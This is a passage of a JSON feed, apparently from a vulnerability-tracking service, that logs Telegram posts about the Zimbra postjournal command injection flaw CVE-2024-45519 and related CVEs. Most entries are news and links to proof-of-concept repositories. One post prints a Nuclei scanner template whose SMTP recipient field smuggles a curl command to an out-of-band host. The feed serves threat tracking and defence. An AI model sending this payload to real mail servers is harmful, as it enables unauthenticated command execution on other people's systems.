\u0431\u044b\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u044b \u044d\u0442\u0438\u043c \u043b\u0435\u0442\u043e\u043c \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0432\u0435\u0431-\u0441\u043a\u0438\u043c\u043c\u0435\u0440 \u043d\u0430 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 \u043e\u043f\u043b\u0430\u0442\u044b. \u0420\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u043d\u0430\u043f\u0435\u0440\u0435\u0433\u043e\u043d\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u043b\u0438 CVE-2024-34102 (CosmicSting).\n\n\ud83c\udf44 FIN7 \u043b\u043e\u0432\u0438\u0442 \u043d\u0430 \u043a\u043b\u0443\u0431\u043d\u0438\u0447\u043a\u0443: \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 NetSupport RAT \u0447\u0435\u0440\u0435\u0437 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0434\u0438\u043f\u0444\u0435\u0439\u043a-\u043e\u0431\u043d\u0430\u0436\u0451\u043d\u043a\u0438.\n\n\ud83d\udcf1 \u0410 \u0432 App Store \u0438 Google Play \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u043c\u043d\u043e\u0433\u043e\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0435 \u0444\u0430\u043b\u044c\u0448\u0438\u0432\u044b\u0435 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u0442\u0440\u0435\u0439\u0434\u0438\u043d\u0433\u0430 \u0438 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u043d\u044b\u0445 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0432\u0438\u0434\u0438\u043c\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u0446\u0435\u043b\u0435\u0432\u044b\u0445 \u043c\u043e\u0448\u0435\u043d\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u0441\u0445\u0435\u043c pig butchering.\n\n\ud83c\udf83\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440\u043e\u0432: StealC (\u0430\u0436 \u0432 \u0442\u0440\u0451\u0445 \u0447\u0430\u0441\u0442\u044f\u0445) \u0438 Amnesia.\n\n\ud83d\udc40 \u041d\u0430 \u043f\u0440\u043e\u0448\u0435\u0434\u0448\u0435\u0439 \u043d\u0435\u0434\u0435\u043b\u0435 \u0431\u044b\u043b\u0430 \u0437\u0430\u043c\u0435\u0447\u0435\u043d\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0434\u0432\u0443\u0445 \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439:  CVE-2024-29824 \u0432 Ivanti Endpoint Manager \u0438 CVE-2024-45519 \u0432 \u043f\u043e\u0447\u0442\u043e\u0432\u043e\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 Zimbra.\n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #APT #\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 @\u041f2\u0422", "creation_timestamp": "2024-10-07T15:36:21.000000Z"}, {"uuid": "3a4f3fcd-111c-4711-9564-763720cedc1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/6424", "content": "\ud83d\udea8CVE-2024-45519 - Zimbra Postjournal Exploit Setup\n\nhttps://darkwebinformer.com/cve-2024-45519-zimbra-postjournal-exploit-setup/", "creation_timestamp": "2024-11-05T22:12:11.000000Z"}, {"uuid": "76c65d80-cc55-42ff-84aa-2d02ae7fcddd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/2101", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-29T17:32:28.000000Z"}, {"uuid": "12bb7c7b-f2f1-47a8-9b04-60477dd21efb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45511", "type": "seen", "source": "https://t.me/cvedetector/11655", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45511 - Zimbra Collaboration XSS Reflective File Upload Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45511 \nPublished : Nov. 20, 2024, 7:15 p.m. | 35\u00a0minutes ago \nDescription : An issue was discovered in Zimbra Collaboration (ZCS) through 10.1. A reflected Cross-Site Scripting (XSS) issue exists through the Briefcase module due to improper sanitization of file content by the OnlyOffice formatter. This occurs when the victim opens a crafted URL pointing to a shared folder containing a malicious file uploaded by the attacker. The vulnerability allows the attacker to execute arbitrary JavaScript in the context of the victim's session. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"20 Nov 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-11-20T21:16:55.000000Z"}, {"uuid": "99b4e808-7655-404f-9039-ea86a3ec03f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45510", "type": "seen", "source": "https://t.me/cvedetector/11661", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45510 - Zimbra Collaboration ZCS Stored Cross-Site Scripting (XSS) Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45510 \nPublished : Nov. 20, 2024, 8:15 p.m. | 39\u00a0minutes ago \nDescription : An issue was discovered in Zimbra Collaboration (ZCS) through 10.0. Zimbra Webmail (Modern UI) is vulnerable to a stored Cross-Site Scripting (XSS) attack due to improper sanitization of user input. This allows an attacker to inject malicious code into specific fields of an e-mail message. When the victim adds the attacker to their contacts, the malicious code is stored and executed when viewing the contact list. This can lead to unauthorized actions such as arbitrary mail sending, mailbox exfiltration, profile picture alteration, and other malicious actions. Proper sanitization and escaping of input fields are necessary to mitigate this vulnerability. \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"20 Nov 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-11-20T22:07:13.000000Z"}, {"uuid": "3d0eccad-f043-4d27-934f-aa3bb6de2176", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45518", "type": "seen", "source": "https://t.me/cvedetector/8637", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45518 - Zimbra Collaboration SSRFleading to RCE\", \n  \"Content\": \"CVE ID : CVE-2024-45518 \nPublished : Oct. 22, 2024, 5:15 p.m. | 44\u00a0minutes ago \nDescription : An issue was discovered in Zimbra Collaboration (ZCS) 10.1.x before 10.1.1, 10.0.x before 10.0.9, 9.0.0 before Patch 41, and 8.8.15 before Patch 46. It allows authenticated users to exploit Server-Side Request Forgery (SSRF) due to improper input sanitization and misconfigured domain whitelisting. This issue permits unauthorized HTTP requests to be sent to internal services, which can lead to Remote Code Execution (RCE) by chaining Command Injection within the internal service. When combined with existing XSS vulnerabilities, this SSRF issue can further facilitate Remote Code Execution (RCE). \nSeverity: 0.0 | NA \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"22 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-22T20:28:39.000000Z"}, {"uuid": "18b515af-affc-4c92-a6ae-8ea0a6837af6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ton618cyber/1598", "content": "#exploit\n1. CVE-2024-45519: \nZimbra SMTP RCE\nhttps://blog.projectdiscovery.io/zimbra-remote-code-execution\n]-> https://github.com/p33d/CVE-2024-45519\n\n2. CVE-2024-41110:\nDocker AuthZ plugins Security Checker\nhttps://github.com/vvpoglazov/cve-2024-41110-checker", "creation_timestamp": "2024-10-02T16:38:49.000000Z"}, {"uuid": "00677a7b-d12d-4b21-93d2-e6970249cda9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/455", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-45519 unauthenticated OS commoand Injection in Zimbra prior to 8.8.15***.\nURL\uff1ahttps://github.com/TOB1a3/CVE-2024-45519-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-09-26T14:25:00.000000Z"}, {"uuid": "dff0dc1f-b2e4-4a44-af11-f3234b22f447", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/4362", "content": "\ud83d\udea8PoC CVE-2024-45519 - Zimbra Postjournal Exploit\n\nhttps://darkwebinformer.com/poc-cve-2024-45519-zimbra-postjournal-exploit/", "creation_timestamp": "2024-10-05T18:46:25.000000Z"}, {"uuid": "05d3c9e9-1bd5-4e20-bd8d-c9baa75c394b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/cvedetector/6885", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-45519 - Zimbra Collaboration Command Injection Vulnerability\", \n  \"Content\": \"CVE ID : CVE-2024-45519 \nPublished : Oct. 2, 2024, 10:15 p.m. | 24\u00a0minutes ago \nDescription : The postjournal service in Zimbra Collaboration (ZCS) before 8.8.15 Patch 46, 9 before 9.0.0 Patch 41, 10 before 10.0.9, and 10.1 before 10.1.1 sometimes allows unauthenticated users to execute commands. \nSeverity: 10.0 | CRITICAL \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"03 Oct 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-10-03T00:43:48.000000Z"}, {"uuid": "d14f6fc1-0b15-4c8f-84a8-ac5aa9852d0a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/CyberBulletin/1012", "content": "\u26a1\ufe0fPoC Exploit Releases for Zimbra RCE Flaw CVE-2024-45519: Mass Exploitation Detected.\n\n#CyberBulletin", "creation_timestamp": "2024-10-02T17:35:52.000000Z"}, {"uuid": "999125f8-3ec7-474c-8092-ddc645a63a55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackerArsenal/515", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-30T10:20:42.000000Z"}, {"uuid": "f9a2854f-8cd6-4438-9fa4-4822c7fdd918", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/z3xploit/668", "content": "PoC CVE-2024-45519 - Zimbra Postjournal Exploit \ud83c\udf4e\n\nExploit\n\n#Poc #cve #exploit", "creation_timestamp": "2024-10-10T09:54:11.000000Z"}, {"uuid": "eb44571b-4f63-4a99-b4f3-7610c3ef1858", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "Telegram/CkXBWnwBfBoySBukTmGlFhbCoxZd7mul-lMTkTsWlZiBLw", "content": "", "creation_timestamp": "2024-10-02T09:40:30.000000Z"}, {"uuid": "0f53449f-0fb2-49c5-9f41-7cfabd36f9a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/CyberBulletin/1096", "content": "\u26a1\ufe0fActive Exploits Target Zimbra Collaboration: Over 19K Systems Vulnerable to CVE-2024-45519.\n\n#CyberBulletin", "creation_timestamp": "2024-10-07T13:15:35.000000Z"}, {"uuid": "dece0112-4011-4e40-9ef5-0b3c3738df43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/22507", "content": "The Hacker News\nResearchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw\n\nCybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra Collaboration.\nEnterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. The attacks seek to exploit CVE-2024-45519, a severe security flaw in its postjournal service that could enable unauthenticated attackers to", "creation_timestamp": "2024-10-02T09:40:31.000000Z"}, {"uuid": "3e7fea30-d32a-46ac-8cf3-d64a4a755b64", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/ZeroEthical_Course/1662", "content": "Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\n#github #exploit #zimbra #rce", "creation_timestamp": "2024-10-06T05:30:19.000000Z"}, {"uuid": "af2bf742-5769-40e4-8d2e-67bf8df16dff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/ZeroEthical_Course/1607", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-29T12:26:59.000000Z"}, {"uuid": "e0154cfc-cd05-41fa-9949-18367bf4fe69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/HackingInsights/15377", "content": "\u200aActive Exploits Target Zimbra Collaboration: Over 19K Systems Vulnerable to CVE-2024-45519\n\nhttps://securityonline.info/active-exploits-target-zimbra-collaboration-over-19k-systems-vulnerable-to-cve-2024-45519/", "creation_timestamp": "2024-10-08T03:27:19.000000Z"}, {"uuid": "a2a5c24f-e245-423c-96b0-75286e7244b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18985", "content": "https://github.com/p33d/CVE-2024-45519\n\nCVE-2024-45519\n#github #exploit", "creation_timestamp": "2024-09-29T17:32:28.000000Z"}, {"uuid": "fd3488df-0cb7-4d62-b67a-90b800becfaa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/HackingInsights/15229", "content": "\u200aZimbra Email Servers Under Attack: CISA Flags CVE-2024-45519 as Actively Exploited\n\nhttps://securityonline.info/zimbra-email-servers-under-attack-cisa-flags-cve-2024-45519-as-actively-exploited/", "creation_timestamp": "2024-10-05T17:00:36.000000Z"}, {"uuid": "6e83d0fe-992d-4129-9efe-0473f016e069", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/HackingInsights/15046", "content": "Critical Zimbra Postjournal flaw CVE-2024-45519 actively exploited in the wild. Patch it now!\nhttps://ift.tt/duWePKx", "creation_timestamp": "2024-10-03T08:40:35.000000Z"}, {"uuid": "cb2cf514-9299-4cd4-9c74-4817cd7a1e40", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/15385", "content": "\u200a19.6K+ Public Zimbra Installations Vulnerable to Code Execution Attacks \u2013 CVE-2024-45519\n\nhttps://gbhackers.com/zimbra-installations-code-execution-attack/", "creation_timestamp": "2024-10-08T03:27:20.000000Z"}, {"uuid": "f320026c-6323-4ba5-9792-27dc838eb3b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/pt_soft/376", "content": "\ud83c\udf83 CVE-2024-45519 : Zimbra - Remote Command Execution\n\nZimbra - \u0448\u0438\u0440\u043e\u043a\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0430 \u0434\u043b\u044f \u0441\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u044b\n\nNuclei \u0448\u0430\u0431\u043b\u043e\u043d:\n\nid: CVE-2024-45519\n\ninfo:\n  name: Zimbra Collaboration Suite < 9.0.0 - Remote Code Execution\n  author: pdresearch,iamnoooob,parthmalhotra,ice3man543\n  severity: critical\n  description: |\n    SMTP-based vulnerability in the PostJournal service of Zimbra Collaboration Suite that allows unauthenticated attackers to inject arbitrary commands. This vulnerability arises due to improper sanitization of SMTP input, enabling attackers to craft malicious SMTP messages that execute commands under the Zimbra user context. Successful exploitation can lead to unauthorized access, privilege escalation, and potential compromise of the affected system\u2019s integrity and confidentiality.\n  reference:\n    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories\n  classification:\n    cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*\n  metadata:\n    vendor: synacor\n    product: zimbra_collaboration_suite\n    shodan-query:\n      - http.title:\"zimbra collaboration suite\"\n      - http.title:\"zimbra web client sign in\"\n      - http.favicon.hash:1624375939\n    fofa-query:\n      - title=\"zimbra web client sign in\"\n      - title=\"zimbra collaboration suite\"\n  tags: cve,cve2024,rce,zimbra\n\njavascript:\n  - pre-condition: |\n      isPortOpen(Host,Port);\n    code: |\n      let m = require('nuclei/net');\n      let address = Host+\":\"+Port;\n      let conn;\n      conn=  m.Open('tcp', address)\n      conn.Send('EHLO localhost\\r\\n');\n      conn.RecvString()\n      conn.Send('MAIL FROM: \\r\\n');\n      conn.RecvString()\n      conn.Send('RCPT TO: <\"aabbb$(curl${IFS}'+oast+')\"@mail.domain.com>\\r\\n');\n      conn.RecvString()\n      conn.Send('DATA\\r\\n');\n      conn.RecvString()\n      conn.Send('aaa\\r\\n');\n      conn.RecvString()\n      conn.Send('.\\r\\n');\n      resp = conn.RecvString()\n      conn.Send('QUIT\\r\\n');\n      conn.Close()\n      resp\n    args:\n      Host: \"{{Host}}\"\n      Port: 25\n      oast: \"{{interactsh-url}}\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n\n      - type: word\n        words:\n          - \"message delivered\"\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 9.0.0 Patch 41 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0432 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 10.0.9 \u0438 10.1.1 \u0438 Zimbra 8.8.15 Patch 46 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445\n\n\ud83d\udcbb PoC\n\n#rce #cve #zimbra #poc\n\n\u2708\ufe0f // Pentest HaT \ud83c\udfa9", "creation_timestamp": "2024-10-06T09:04:26.000000Z"}, {"uuid": "be9c394b-9c15-4530-8b86-04a69d9f2a10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "seen", "source": "https://t.me/softrinx/151795", "content": "CVE-2024-45519 \n*\nSMTP exploit", "creation_timestamp": "2024-09-30T00:37:28.000000Z"}, {"uuid": "b45bf6e4-3b0b-4ddb-b7ce-5d79dff924af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "Telegram/1ZL9Gy8NcGFZ3EukYR7KgdreC6GML4uuvOnd8ACoqLrL-Q", "content": "", "creation_timestamp": "2024-10-02T10:21:54.000000Z"}, {"uuid": "688c45af-1f4a-4f72-8e5f-485bf7fc60d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/4798", "content": "The Hacker News\nResearchers Sound Alarm on Active Attacks Exploiting Critical Zimbra Postjournal Flaw\n\nCybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra Collaboration.\nEnterprise security firm Proofpoint said it began observing the activity starting September 28, 2024. The attacks seek to exploit CVE-2024-45519, a severe security flaw in its postjournal service that could enable unauthenticated attackers to", "creation_timestamp": "2024-10-02T09:40:31.000000Z"}, {"uuid": "a4dac830-028a-4c1d-bdc6-f614decfad2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1074", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:25:19.000000Z"}, {"uuid": "0458c5ef-1991-41a3-9170-ffa4261d9d6e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/CyberDilara/1039", "content": "Hackers Factory \n\nShodan Mindmap - For Hacking! \n\nSource: https://github.com/Ignitetechnologies/Mindmap/blob/main/Shodan/Shodan%20HD.png\n\nGuide: Build Your Own Penetration Testing Dropbox Using a Raspberry Pi 4\n\nBlog: https://artificesecurity.com/how-to-build-your-own-penetration-testing-dropbox-using-a-raspberry-pi-4/\n\n#infosec #bugbountytips\n\nDetailed Checklist: Android APK Pentesting Checklist \n\nChecklist: https://book.hacktricks.xyz/mobile-pentesting/android-checklist\n\n#infosec\n\nCVE-2024-45519:\u00a0 Checks vulnerabilities in an SMTP server, Zimbra Remote Command Execution.\n\nhttps://github.com/p33d/CVE-2024-45519\n\nFor basic researches, top 25 vulnerability parameters that can be used in automation tools or manual recon.\n\nhttps://github.com/lutfumertceylan/top25-parameter\n\nXXE payloads for specific DTDs\n\nhttps://github.com/GoSecure/dtd-finder/blob/698fd678f26395e1c7c097525f7182aecad0cd5f/list/xxe_payloads.md\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-10-08T09:21:39.000000Z"}, {"uuid": "bc17480e-be20-4e66-b5ee-14af44a02b5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/8888", "content": "Tools - Hackers Factory \n\nIndetectables-net/toolkit: The essential toolkit for reversing, malware analysis, and cracking.\n\nhttps://github.com/indetectables-net/toolkit\n\nGitHub - Chocapikk/CVE-2024-45519: Zimbra - Remote Command Execution (CVE-2024-45519)\n\nhttps://github.com/Chocapikk/CVE-2024-45519\n\nOWASP Amass Project\n\nhttps://github.com/owasp-amass\n\nPoC for the Untrusted Pointer Dereference in the ks.sys driver\n\nhttps://github.com/varwara/CVE-2024-35250\n\nPOC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692\n\nhttps://github.com/verylazytech/CVE-2024-23692\n\nPowerShell Obfuscator\n\nhttps://github.com/TaurusOmar/psobf\n\nModTracer Finds Hidden Linux Kernel Rootkits and then make visible again.\n\nhttps://github.com/MatheuZSecurity/ModTracer\n\n1C RAS Offensive Security Tool\n\nhttps://github.com/sdnv0x4d/rasoff\n\nRust Weaponization for Red Team Engagements.\n\nhttps://github.com/trickster0/OffensiveRust\n\n#CyberDilara\nhttps://t.me/dilagrafie", "creation_timestamp": "2024-10-21T13:23:53.000000Z"}, {"uuid": "49783f6d-594f-4fe9-b90c-afa811a72bf6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "published-proof-of-concept", "source": "Telegram/LZ7XOPRoqwALVNc8I3LUwpNf-8CJ2PR-4TjRcjv0Z8qsO3g", "content": "", "creation_timestamp": "2025-03-09T04:00:07.000000Z"}, {"uuid": "28554b3b-3f51-4eeb-a050-8c75efc91116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45519", "type": "exploited", "source": "https://t.me/KomunitiSiber/2661", "content": "Researchers Warn of Ongoing Attacks Exploiting Critical Zimbra Postjournal Flaw\nhttps://thehackernews.com/2024/10/researchers-sound-alarm-on-active.html\n\nCybersecurity researchers are warning about active exploitation attempts targeting a newly disclosed security flaw in Synacor's Zimbra 